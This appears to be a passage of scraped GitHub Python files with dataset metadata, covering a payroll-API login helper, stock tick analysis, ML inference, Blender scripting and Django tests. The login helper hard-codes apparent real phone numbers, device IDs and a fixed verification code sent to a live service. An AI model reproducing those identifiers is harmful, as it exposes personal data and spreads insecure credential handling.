{"api_name": "numpy.random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 59, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 60, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 60, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "21954742624", "text": "import requests,json\n\ndef loginmain():\n\n def setUp(self):\n # 测试前需执行的操作\n print('========================start==========================')\n self.loginUrl = 'https://tautodiscover.ctgpayroll.com/ehr_saas/newMobile/login/login.mobile'\n self.checkUrl = 'https://autodiscover.ctgpayroll.com/ehr_saas/web/attEmpLog/saveAttEmpLog.mobile'\n self.headers = {'Content-Type': 'application/json'}\n self.checkLocationUrl = 'https://autodiscover.ctgpayroll.com/ehr_saas/web/attSetLocation/saveAttSetLocation.mobileHr'\n\n def tearDown(self):\n # 测试用例执行完后所需执行的操作\n print('=========================stop===================================')\n\n def login_token():\n # 用户成功登陆后获取token\n loginUrl = 'https://autodiscover.ctgpayroll.com/ehr_saas/newMobile/login/login.mobile'\n headers = {'Content-Type': 'application/json'}\n json_param = {\n 'custId': '15921595797504',\n 'deviceId': '8B39DD16-3442-43DE-959D-0EE9CD0C1EE6',\n 'mobile': '18612533709',\n 'verificationCode': '4321'\n }\n r = requests.post(loginUrl,data=json.dumps(json_param),headers=headers)\n return r.json()['result']['data']['token']\n\n def login_deptId():\n # 用户成功登陆后获取DeptId\n loginUrl = 'https://autodiscover.ctgpayroll.com/ehr_saas/newMobile/login/login.mobile'\n headers = {'Content-Type': 'application/json'}\n json_param = {\n 'custId': '98666751995904',\n 'deviceId': 'E7F91090-FD98-49D0-9382-D37B1059D013',\n 'mobile': '13522535090',\n 'verificationCode': '4321'\n }\n r = requests.post(loginUrl,data=json.dumps(json_param),headers=headers)\n return r.json()['result']['data']['emp']['deptId']", "repo_name": "wanggs4/eHr_SaasEmp", "sub_path": "emp_login/loginmain.py", "file_name": "loginmain.py", "file_ext": "py", "file_size_in_byte": 1899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.post", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "19308239921", "text": "# Momentum.py\r\n\"\"\"Analyze tick data to extract momentum patterns\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport data_reader\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n data = []\r\n f = open(filename)\r\n try:\r\n reader = csv.reader(f, delimiter=',')\r\n # return an iterator with each iteration being a row of the data file\r\n for idx, row in enumerate(reader):\r\n data.append(row)\r\n finally:\r\n f.close()\r\n\r\n # pre-processing\r\n\r\n data = pd.DataFrame(data)\r\n data = data.iloc[:, -7:-1]\r\n data.columns = [\"bid_price\", \"bid_size\", \"ask_price\", \"ask_size\", \"last_transact_price\", \"last_transact_size\"]\r\n for i in range(data.shape[1]):\r\n data.iloc[:, i] = data.iloc[:, i].apply(float) # convert str to float\r\n \"\"\"\r\n\r\n filename = \"data/US_Equity/SPY/20160302/SPY.csv\"\r\n data = data_reader.read_usequity_tickfile(filename)\r\n data = data[-2000:] # use first 20k ticks\r\n\r\n # calculate weighted mid mkt\r\n data[\"weighted_mid_price\"] = (data[\"bid_price\"] * data[\"ask_size\"] + data[\"ask_price\"] * data[\"bid_size\"]) / \\\r\n (data[\"bid_size\"] + data[\"ask_size\"])\r\n # calculate spread\r\n data[\"spread\"] = data[\"ask_price\"] - data[\"bid_price\"]\r\n\r\n # use wmm to define continuous up/downs in tick price (3, 4, 5 ups or downs in a row)\r\n wmm_up_t = data[\"weighted_mid_price\"].diff() > 0 # uptick\r\n wmm_down_t = data[\"weighted_mid_price\"].diff() < 0 # uptick\r\n\r\n wmm_up_3t = pd.Series(0.0, index=data.index)\r\n wmm_up_4t = pd.Series(0.0, index=data.index)\r\n wmm_up_5t = pd.Series(0.0, index=data.index)\r\n wmm_down_3t = pd.Series(0.0, index=data.index)\r\n wmm_down_4t = pd.Series(0.0, index=data.index)\r\n wmm_down_5t = pd.Series(0.0, index=data.index)\r\n \r\n for i in range(2, len(data)):\r\n if all(wmm_up_t[j] for j in range(i - 2, i + 1)):\r\n wmm_up_3t[i] = 1\r\n for i in range(3, len(data)):\r\n if all(wmm_up_t[j] for j in range(i - 3, i + 1)):\r\n wmm_up_4t[i] = 0.75\r\n for i in range(4, len(data)):\r\n if all(wmm_up_t[j] for j in range(i - 4, i + 1)):\r\n wmm_up_5t[i] = 0.5\r\n for i in range(2, len(data)):\r\n if all(wmm_down_t[j] for j in range(i - 2, i + 1)):\r\n wmm_down_3t[i] = -1\r\n for i in range(3, len(data)):\r\n if all(wmm_down_t[j] for j in range(i - 3, i + 1)):\r\n wmm_down_4t[i] = -0.75\r\n for i in range(4, len(data)):\r\n if all(wmm_down_t[j] for j in range(i - 4, i + 1)):\r\n wmm_down_5t[i] = -0.5\r\n\r\n # compare last transact price to bid/ask/wmm and define momentum\r\n transact_up_t = data[\"last_transact_price\"] >= data[\"ask_price\"] # last transact at or above ask\r\n transact_down_t = data[\"last_transact_price\"] <= data[\"bid_price\"] # last transact at or below bid\r\n\r\n transact_up_10t = pd.Series(0.0, index=data.index)\r\n transact_up_20t = pd.Series(0.0, index=data.index)\r\n transact_up_30t = pd.Series(0.0, index=data.index)\r\n transact_down_10t = pd.Series(0.0, index=data.index)\r\n transact_down_20t = pd.Series(0.0, index=data.index)\r\n transact_down_30t = pd.Series(0.0, index=data.index)\r\n\r\n for i in range(9, len(data)):\r\n if all(transact_up_t[j] for j in range(i - 9, i + 1)):\r\n transact_up_10t[i] = 1\r\n for i in range(19, len(data)):\r\n if all(transact_up_t[j] for j in range(i - 19, i + 1)):\r\n transact_up_20t[i] = 0.75\r\n for i in range(29, len(data)):\r\n if all(transact_up_t[j] for j in range(i - 29, i + 1)):\r\n transact_up_30t[i] = 0.5\r\n for i in range(9, len(data)):\r\n if all(transact_down_t[j] for j in range(i - 9, i + 1)):\r\n transact_down_10t[i] = -1\r\n for i in range(19, len(data)):\r\n if all(transact_down_t[j] for j in range(i - 19, i + 1)):\r\n transact_down_20t[i] = -0.75\r\n for i in range(29, len(data)):\r\n if all(transact_down_t[j] for j in range(i - 29, i + 1)):\r\n transact_down_30t[i] = -0.5\r\n\r\n #######################################\r\n # plot\r\n\r\n # 1. plot wmm along with bid, ask, and last transacted price \r\n fig1 = plt.figure(figsize=(12, 9))\r\n fig1.set_tight_layout(True)\r\n ax1 = plt.subplot(211)\r\n ax1.grid()\r\n ax1.plot(data[[\"bid_price\", \"ask_price\", \"weighted_mid_price\"]])\r\n ax1.legend([\"bid\", \"ask\", \"wmm\"], loc=\"upper left\", fontsize=10)\r\n ax1.set_ylabel(\"($)\")\r\n ax1.set_title(\"Tick Prices (SPY)\", fontsize=14)\r\n \r\n plt.setp(ax1.get_xticklabels(), fontsize=12)\r\n \r\n # plot spread\r\n ax2 = plt.subplot(212, sharex=ax1)\r\n ax2.plot(data[\"spread\"], '.', color=\"orange\")\r\n ax2.grid()\r\n ax2.set_xlabel(\"Time\")\r\n ax2.set_ylabel(\"($)\")\r\n ax2.legend([\"Spread\"], loc=\"upper left\", fontsize=10)\r\n\r\n ax3 = ax2.twinx()\r\n ax3.plot(data[\"last_transact_size\"], color=\"dodgerblue\")\r\n ax3.set_ylabel(\"volume\")\r\n ax3.legend([\"Volume\"], loc=\"upper center\", fontsize=10)\r\n\r\n fig1.savefig(\"result/us_equity_data/1.tick_price_and_spreads.png\")\r\n\r\n # 2. plot prices along with defined tick ups/downs \r\n fig2 = plt.figure(figsize=(12, 9))\r\n fig2.set_tight_layout(True)\r\n ax1 = plt.subplot(111)\r\n ax1.grid()\r\n ax1.plot(data[[\"bid_price\", \"ask_price\", \"weighted_mid_price\", \"last_transact_price\"]])\r\n ax1.legend([\"bid\", \"ask\", \"wmm\", \"last_transact\"], loc=\"upper left\", fontsize=8)\r\n ax1.set_xlabel(\"Time\")\r\n ax1.set_ylabel(\"($)\")\r\n\r\n ax2 = ax1.twinx()\r\n ax2.plot(wmm_up_3t.index[wmm_up_3t == 1], wmm_up_3t[wmm_up_3t == 1],\r\n '+', color=\"lightgreen\")\r\n ax2.plot(wmm_up_4t.index[wmm_up_4t == 0.75], wmm_up_4t[wmm_up_4t == 0.75],\r\n '+', color=\"green\")\r\n ax2.plot(wmm_up_5t.index[wmm_up_5t == 0.5], wmm_up_5t[wmm_up_5t == 0.5],\r\n '+', color=\"darkslategray\")\r\n ax2.plot(wmm_down_5t.index[wmm_down_5t == -0.5], wmm_down_5t[wmm_down_5t == -0.5],\r\n 'x', color=\"midnightblue\")\r\n ax2.plot(wmm_down_4t.index[wmm_down_4t == -0.75], wmm_down_4t[wmm_down_4t == -0.75],\r\n 'x', color=\"blue\")\r\n ax2.plot(wmm_down_3t.index[wmm_down_3t == -1], wmm_down_3t[wmm_down_3t == -1],\r\n 'x', color=\"lightblue\")\r\n ax2.grid()\r\n ax2.set_ylim(-1.5, 1.5)\r\n #ax2.set_ylabel(\"Indicator\")\r\n ax2.legend([\"3-tick up\", \"4-tick up\", \"5-tick up\", \"5-tick down\", \"4-tick down\", \"3-tick down\"],\r\n loc=\"upper center\", ncol=2, fontsize=8)\r\n ax2.set_title(\"Tick Price Move and Momentum Indicators (SPY)\", fontsize=14)\r\n\r\n fig2.savefig(\"result/us_equity_data/2.tick_price_and_wmm_up_downs.png\")\r\n\r\n # 3. plot prices along with defined transact price ups/downs\r\n fig3 = plt.figure(figsize=(12, 9))\r\n fig3.set_tight_layout(True)\r\n ax1 = plt.subplot(111)\r\n ax1.grid()\r\n ax1.plot(data[[\"bid_price\", \"ask_price\", \"weighted_mid_price\", \"last_transact_price\"]])\r\n ax1.legend([\"bid\", \"ask\", \"wmm\", \"last_transt\"], loc=\"upper left\", fontsize=8)\r\n ax1.set_xlabel(\"Time\")\r\n ax1.set_ylabel(\"($)\")\r\n\r\n ax2 = ax1.twinx()\r\n ax2.plot(transact_up_10t.index[transact_up_10t == 1], transact_up_10t[transact_up_10t == 1],\r\n '+', color=\"lightgreen\")\r\n ax2.plot(transact_up_20t.index[transact_up_20t == 0.75], transact_up_20t[transact_up_20t == 0.75],\r\n '+', color=\"green\")\r\n ax2.plot(transact_up_30t.index[transact_up_30t == 0.5], transact_up_30t[transact_up_30t == 0.5],\r\n '+', color=\"darkslategray\")\r\n ax2.plot(transact_down_30t.index[transact_down_30t == -0.5], transact_down_30t[transact_down_30t == -0.5],\r\n 'x', color=\"midnightblue\")\r\n ax2.plot(transact_down_20t.index[transact_down_20t == -0.75], transact_down_20t[transact_down_20t == -0.75],\r\n 'x', color=\"blue\")\r\n ax2.plot(transact_down_10t.index[transact_down_10t == -1], transact_down_10t[transact_down_10t == -1],\r\n 'x', color=\"lightblue\")\r\n ax2.grid()\r\n ax2.set_ylim(-1.5, 1.5)\r\n #ax2.set_ylabel(\"Indicator\")\r\n ax2.legend([\"10-tick trade@ask\", \"20-tick trade@ask\", \"30-tick trade@ask\",\r\n \"30-tick trade@bid\", \"20-tick trade@bid\", \"10-tick trade@bid\"],\r\n loc=\"upper center\", ncol=2, fontsize=8)\r\n ax2.set_title(\"Tick Price Move and Transacted Price Pattern (SPY)\", fontsize=14)\r\n\r\n fig3.savefig(\"result/us_equity_data/3.tick_price_and_transacted_price_pattern.png\")\r\n \r\n plt.close('all')\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n", "repo_name": "shuxiangcun/alphapy", "sub_path": "US_Equity_Data.py", "file_name": "US_Equity_Data.py", "file_ext": "py", "file_size_in_byte": 8480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "data_reader.read_usequity_tickfile", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}]} +{"seq_id": "35567546804", "text": "import cx_Oracle\nimport pandas as pd\nimport os, sys, time\nfrom riipl import SaveTensor\n\npopulation, lookback, doc_sentences, dim_date, out = sys.argv[1:]\n\ndef main():\n sql = \"\"\"\n SELECT DISTINCT\n pop.riipl_id,\n lb.timestep,\n 'SENTENCED_' || UPPER(ds.offense_type) AS offense\n FROM {population} pop\n LEFT JOIN {lookback} lb\n ON pop.riipl_id = lb.riipl_id\n LEFT JOIN {dim_date} dd\n ON lb.yrmo = dd.yrmo\n INNER JOIN {doc_sentences} ds\n ON lb.riipl_id = ds.riipl_id AND\n dd.date_dt = ds.imposed_date\n \"\"\".format(**globals())\n\n with cx_Oracle.connect(\"/\") as cxn:\n features = pd.read_sql(sql, cxn)\n\n labels = {\n \"SENTENCED_ASSAULT\" : \"serving sentence for assault\",\n \"SENTENCED_DRUG_OFF\" : \"serving sentence for a drug-related offense\",\n \"SENTENCED_HOMICIDE\" : \"serving sentence for homicide\",\n \"SENTENCED_PROP_OFF\" : \"serving sentence for a property-related offense\",\n \"SENTENCED_PUB_OFF\" : \"serving sentence for a public offense\",\n \"SENTENCED_ROBBERY\" : \"serving sentence for robbery\",\n \"SENTENCED_SEX_OFF\" : \"serving sentence for a sex offense\"\n }\n\n tensor = {}\n for feature in labels:\n tensor[feature] = features.loc[features.OFFENSE == feature, [\"RIIPL_ID\", \"TIMESTEP\"]]\n\n fill_values = dict((feature, 0) for feature in tensor)\n\n SaveTensor(tensor, labels, fill_values, (population, \"RIIPL_ID\"), out)\n\n\n# EXECUTE\nif __name__ == \"__main__\":\n start = time.time()\n main()\n print(\"---%s seconds ---\" % (time.time() - start))\n\n# vim: expandtab sw=4 ts=4\n", "repo_name": "ripl-org/predict-opioids", "sub_path": "source/tensors/DOC/sentences.py", "file_name": "sentences.py", "file_ext": "py", "file_size_in_byte": 1698, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "cx_Oracle.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 25, "usage_type": "call"}, {"api_name": "riipl.SaveTensor", "line_number": 43, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "21318829311", "text": "import keras\nimport tensorflow as tf\nimport scipy.misc as misc\nimport argparse\nimport numpy as np\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('tflite_file', help='file of tflite model')\n parser.add_argument('image_files', type=str, nargs='+', help='file of image which is aligned')\n parser.add_argument('--image_size', default=112, type=int, help='size of image to feed the model')\n\n return parser.parse_args()\n\ndef load_images(args):\n # imgs = np.empty((len(args.image_files), args.image_size, args.image_size, 3), np.float32)\n for i, image in enumerate(args.image_files):\n # img = cv2.imread(image)\n # img = np.asarray(Image.open(image))\n img = misc.imread(image)\n img = misc.imresize(img, (args.image_size, args.image_size))\n img = (img - 127.5) * 0.0078125\n img = img.astype(np.float32)\n # imgs[i, ...] = img\n return np.stack([img])\n\ndef _main(args):\n interpreter = tf.lite.Interpreter(model_path=args.tflite_file)\n interpreter.allocate_tensors()\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n images = load_images(args)\n interpreter.set_tensor(input_details[0]['index'], images)\n interpreter.invoke()\n emb = interpreter.get_tensor(output_details[0]['index'])\n print('='*30)\n print('input is :')\n print(images,images.shape)\n print('=' * 30)\n print('output is :')\n print(emb, emb.shape)\n\n\n\nif __name__ == '__main__':\n \"\"\"\n python inference_example.py arch/pretrained_model/MobileFaceNet_iter_566000.tflite data/Figure_110.png\n \"\"\"\n _main(get_args())\n", "repo_name": "fanqie03/MobileFaceNet_keras", "sub_path": "inference_example.py", "file_name": "inference_example.py", "file_ext": "py", "file_size_in_byte": 1666, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "scipy.misc.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.misc", "line_number": 22, "usage_type": "name"}, {"api_name": "scipy.misc.imresize", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.misc", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.lite.Interpreter", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.lite", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "29255835792", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nnp.random.seed(42)\nx = np.random.rand(100) * 10\ny = 3 * x + np.random.randn(100) * 2\n\n\ndata = {'X': x, 'Y': y}\ndf = pd.DataFrame(data)\n\n\nplt.scatter(df['X'], df['Y'])\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.title('Doğrusal İlişki')\nplt.show()\n\n\ncorrelation = df['X'].corr(df['Y'])\nlinear_fit = np.polyfit(df['X'], df['Y'], 1)\nslope = linear_fit[0]\nintercept = linear_fit[1]\n\nprint('Korelasyon:', correlation)\nprint('Eğim:', slope)\nprint('Düzey:', intercept)\n", "repo_name": "Rk1coder/data_machine_learning_pratices", "sub_path": "practices_numpy_matplotlib_pandas_3.py", "file_name": "practices_numpy_matplotlib_pandas_3.py", "file_ext": "py", "file_size_in_byte": 531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.random.seed", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 6, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "3589367397", "text": "import bpy\nimport random\n\n# Clear all mesh objects\nbpy.ops.object.select_all(action='DESELECT')\nbpy.ops.object.select_by_type(type='MESH')\nbpy.ops.object.delete()\n\n# Parameters\ncity_size = 10\nbuilding_min_height = 1.0\nbuilding_max_height = 10.0\n\n# Function to create a random color material\ndef create_random_color_material(name):\n material = bpy.data.materials.new(name=name)\n material.use_nodes = True\n nodes = material.node_tree.nodes\n links = material.node_tree.links\n\n color = nodes.get('Principled BSDF')\n if color:\n color.inputs[0].default_value = (random.random(), random.random(), random.random(), 1)\n\n return material\n\n# Create buildings\nfor i in range(city_size):\n for j in range(city_size):\n building_height = random.uniform(building_min_height, building_max_height)\n \n bpy.ops.mesh.primitive_cube_add(size=1, enter_editmode=False, location=(i*2, j*2, building_height/2))\n \n building = bpy.context.object\n building.dimensions.z = building_height\n\n # Assign random color to the building\n material = create_random_color_material(f\"Material_{i}_{j}\")\n if building.data.materials:\n # Assign to first material slot\n building.data.materials[0] = material\n else:\n # No slots\n building.data.materials.append(material)\n", "repo_name": "mhatrep/Blender", "sub_path": "blender_city.py", "file_name": "blender_city.py", "file_ext": "py", "file_size_in_byte": 1367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "bpy.ops.object.select_all", "line_number": 5, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.select_by_type", "line_number": 6, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 6, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.delete", "line_number": 7, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 7, "usage_type": "attribute"}, {"api_name": "bpy.data.materials.new", "line_number": 16, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 16, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 23, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 30, "usage_type": "call"}, {"api_name": "bpy.ops.mesh.primitive_cube_add", "line_number": 32, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 32, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 34, "usage_type": "attribute"}]} +{"seq_id": "13920409419", "text": "\"\"\"Contains the logic for extracting and transforming the project data.\"\"\"\n\nimport warnings\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom helpsk.logging import log_function_call, log_timer\nfrom sklearn.datasets import fetch_openml\n\n\n@log_function_call\n@log_timer\ndef extract() -> pd.DataFrame:\n \"\"\"Downloads and returns the credit data from openml.org.\"\"\"\n logging.info(\"Downloading credit data from https://www.openml.org/d/31\")\n credit_g = fetch_openml('credit-g', version=1)\n credit_data = credit_g['data']\n credit_data['target'] = credit_g['target']\n return credit_data\n\n\n@log_function_call\n@log_timer\ndef transform(credit__raw: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Transforms the credit data.\n\n Args:\n credit__raw: the raw data to transform\n \"\"\"\n credit = credit__raw.copy()\n # Create Missing Values\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n credit['duration'].iloc[0:46] = np.nan\n credit['checking_status'].iloc[25:75] = np.nan\n credit['credit_amount'].iloc[10:54] = 0\n return credit\n", "repo_name": "shane-kercheval/chat-search-docs", "sub_path": "source/service/etl.py", "file_name": "etl.py", "file_ext": "py", "file_size_in_byte": 1107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_openml", "line_number": 18, "usage_type": "call"}, {"api_name": "helpsk.logging.log_function_call", "line_number": 13, "usage_type": "name"}, {"api_name": "helpsk.logging.log_timer", "line_number": 14, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "attribute"}, {"api_name": "warnings.catch_warnings", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 38, "usage_type": "attribute"}, {"api_name": "helpsk.logging.log_function_call", "line_number": 24, "usage_type": "name"}, {"api_name": "helpsk.logging.log_timer", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "5312538538", "text": "from torch import optim\n\nfrom models import LightGCN\nfrom configuration import Config\n\nclass BPRLoss:\n def __init__(self, model: LightGCN, config: Config):\n self.decay = config.decay\n self.lr = config.lr\n self.model = model\n\n self.opt = optim.Adam(model.parameters(), lr=self.lr)\n\n def step(self, users, pos, neg):\n loss, reg_loss = self.model.bpr_loss(users, pos, neg)\n reg_loss = reg_loss * self.decay\n loss = loss + reg_loss\n\n # 优化模型参数\n self.opt.zero_grad()\n loss.backward()\n self.opt.step()\n\n return loss.cpu().item() # 返回loss的值", "repo_name": "dang-mai/LightGCN", "sub_path": "code/loss.py", "file_name": "loss.py", "file_ext": "py", "file_size_in_byte": 643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "models.LightGCN", "line_number": 7, "usage_type": "name"}, {"api_name": "configuration.Config", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "23811273103", "text": "from django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom selenium.webdriver.common.by import By\n\nfrom functional_tests.base import FunctionalTest\nfrom functional_tests.management.commands.create_session import create_pre_authenticated_session\n\nUser = get_user_model()\n\nTEST_EMAIL = \"test@example.com\"\n\n\nclass MyListsTest(FunctionalTest):\n def create_pre_authenticated_session(self, email):\n if self.staging_server:\n from functional_tests.server_tools import create_session_on_server\n\n session_key = create_session_on_server(self.staging_server, email)\n else:\n session_key = create_pre_authenticated_session(email)\n\n self.browser.get(self.live_server_url + \"/404_no_such_url/\")\n self.browser.add_cookie(dict(name=settings.SESSION_COOKIE_NAME, value=session_key, path=\"/\"))\n\n def test_logged_in_users_lists_are_saved_as_my_lists(self):\n self.create_pre_authenticated_session(TEST_EMAIL)\n self.browser.get(self.live_server_url)\n\n self.add_list_item(\"First list item\")\n self.add_list_item(\"Second list item\")\n\n first_list_url = self.browser.current_url\n\n self.browser.find_element(By.LINK_TEXT, \"My lists\").click()\n\n self.wait_for(lambda: self.browser.find_element(By.LINK_TEXT, \"First list item\"))\n self.browser.find_element(By.LINK_TEXT, \"First list item\").click()\n self.wait_for(lambda: self.assertEqual(self.browser.current_url, first_list_url))\n\n self.browser.get(self.live_server_url)\n self.add_list_item(\"Another list item\")\n second_list_url = self.browser.current_url\n\n self.browser.find_element(By.LINK_TEXT, \"My lists\").click()\n\n self.wait_for(lambda: self.browser.find_element(By.LINK_TEXT, \"Another list item\"))\n self.browser.find_element(By.LINK_TEXT, \"Another list item\").click()\n self.wait_for(lambda: self.assertEqual(self.browser.current_url, second_list_url))\n\n self.browser.find_element(By.LINK_TEXT, \"Log out\").click()\n self.wait_for(lambda: self.assertEqual(self.browser.find_elements(By.LINK_TEXT, \"My lists\"), []))\n", "repo_name": "VolodymyrVdovyn/TDD_book_django_project", "sub_path": "src/functional_tests/test_my_lists.py", "file_name": "test_my_lists.py", "file_ext": "py", "file_size_in_byte": 2155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 8, "usage_type": "call"}, {"api_name": "functional_tests.base.FunctionalTest", "line_number": 13, "usage_type": "name"}, {"api_name": "functional_tests.server_tools.create_session_on_server", "line_number": 18, "usage_type": "call"}, {"api_name": "functional_tests.management.commands.create_session.create_pre_authenticated_session", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.SESSION_COOKIE_NAME", "line_number": 23, "usage_type": "attribute"}, {"api_name": 